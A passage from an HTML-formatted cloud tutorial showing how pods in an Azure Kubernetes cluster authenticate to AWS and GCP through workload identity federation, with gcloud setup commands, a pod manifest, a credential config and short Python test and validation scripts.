            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Get caller identity
&lt;/span&gt;        &lt;span class="n"&gt;sts_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;identity&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sts_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_caller_identity&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;🔐 Authenticated as: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;identity&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Arn&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ AWS Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like the following for the pod (&lt;code&gt;kubectl logs -f -n default aks-aws-test&lt;/code&gt;), the AKS-to-AWS authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ AWS Authentication successful!
Found &amp;lt;number of buckets&amp;gt; S3 buckets:
  - bucket-1
  - bucket-2
  - ...

🔐 Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/aks-to-aws-role/botocore-session-&amp;lt;some random number&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Authenticating to GCP from AKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get AKS OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Set up GCP project&lt;/span&gt;
gcloud auth login
gcloud config &lt;span class="nb"&gt;set &lt;/span&gt;project YOUR_PROJECT_ID
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create Workload Identity Pool in GCP&lt;/span&gt;
gcloud iam workload-identity-pools create aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"AKS Pool"&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create OIDC provider (CORRECT audience pattern)&lt;/span&gt;
gcloud iam workload-identity-pools providers create-oidc aks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--issuer-uri&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--allowed-audiences&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"//iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-mapping&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"google.subject=assertion.sub,attribute.service_account=assertion.sub"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub.startsWith('system:serviceaccount:default:aks-cross-cloud-sa')"&lt;/span&gt;

&lt;span class="c"&gt;# 5. Create GCP Service Account&lt;/span&gt;
gcloud iam service-accounts create aks-gcp-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"AKS to GCP Service Account"&lt;/span&gt;

&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"aks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Service Account: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create bucket&lt;/span&gt;
gcloud storage buckets create gs://aks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--uniform-bucket-level-access&lt;/span&gt;

&lt;span class="c"&gt;# 7. Grant GCS permissions to service account&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# 8. Grant bucket-specific permissions (optional, redundant with storage.admin)&lt;/span&gt;
gsutil iam ch serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://aks-cross-cloud

&lt;span class="c"&gt;# 9. Allow workload identity to impersonate - METHOD 1 (using principalSet)&lt;/span&gt;
&lt;span class="c"&gt;# Add the correct bindings with full subject path&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;

gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.serviceAccountTokenCreator &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate Scenario 2.3. If authentication is working, you will see the success logs shown further below.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario2-3-aks-to-gcp.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-gcp-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir google-auth google-cloud-storage &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_gcp_from_aks.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GOOGLE_APPLICATION_CREDENTIALS&lt;/span&gt;
        &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity/config.json&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;
        &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_PROJECT_ID"&lt;/span&gt;  &lt;span class="c1"&gt;# Replace with actual project ID&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens&lt;/span&gt;
        &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config-aks&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-aks&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
      &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
              &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
              &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;//iam.googleapis.com/projects/YOUR_PROJECT_NUMBER/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;config.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;{&lt;/span&gt;
      &lt;span class="s"&gt;"type": "external_account",&lt;/span&gt;
      &lt;span class="s"&gt;"audience": "//iam.googleapis.com/projects/YOUR_PROJECT_NUMBER/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider",&lt;/span&gt;
      &lt;span class="s"&gt;"subject_token_type": "urn:ietf:params:oauth:token-type:jwt",&lt;/span&gt;
      &lt;span class="s"&gt;"token_url": "https://sts.googleapis.com/v1/token",&lt;/span&gt;
      &lt;span class="s"&gt;"service_account_impersonation_url": "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/aks-gcp-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com:generateAccessToken",&lt;/span&gt;
      &lt;span class="s"&gt;"credential_source": {&lt;/span&gt;
        &lt;span class="s"&gt;"file": "/var/run/secrets/azure/tokens/azure-identity-token"&lt;/span&gt;
      &lt;span class="s"&gt;}&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;span class="s"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_gcp_from_aks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
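&lt;p&gt;The &lt;code&gt;config.json&lt;/code&gt; above is the external account credential file that &lt;code&gt;google-auth&lt;/code&gt; loads via &lt;code&gt;GOOGLE_APPLICATION_CREDENTIALS&lt;/code&gt;: it tells the library to exchange the projected Kubernetes token at &lt;code&gt;sts.googleapis.com&lt;/code&gt; and then impersonate the GCP service account. A common failure mode is leaving the &lt;code&gt;YOUR_PROJECT_NUMBER&lt;/code&gt; / &lt;code&gt;YOUR_PROJECT_ID&lt;/code&gt; placeholders in place. The helper below is an illustrative offline sanity check, not part of the scenario:&lt;/p&gt;

```python
# Sanity-check an external_account config before deploying (illustrative helper).
import json

REQUIRED_KEYS = {"type", "audience", "subject_token_type", "token_url", "credential_source"}
PLACEHOLDERS = ("YOUR_PROJECT_NUMBER", "YOUR_PROJECT_ID")

def check_external_account_config(text: str) -> list:
    """Return a list of problems found in the config; empty means it looks OK."""
    cfg = json.loads(text)
    problems = []
    missing = REQUIRED_KEYS - cfg.keys()
    if missing:
        problems.append(f"missing keys: {sorted(missing)}")
    if cfg.get("type") != "external_account":
        problems.append("'type' must be 'external_account'")
    for key in ("audience", "service_account_impersonation_url"):
        if any(p in cfg.get(key, "") for p in PLACEHOLDERS):
            problems.append(f"'{key}' still contains a placeholder")
    if "file" not in cfg.get("credential_source", {}):
        problems.append("'credential_source' must point at the projected token file")
    return problems
```

&lt;p&gt;Run it against the ConfigMap's &lt;code&gt;config.json&lt;/code&gt; value before &lt;code&gt;kubectl apply&lt;/code&gt;; any non-empty result means the pod would fail the token exchange.&lt;/p&gt;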



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_gcp_from_aks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.auth&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;default&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;project&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
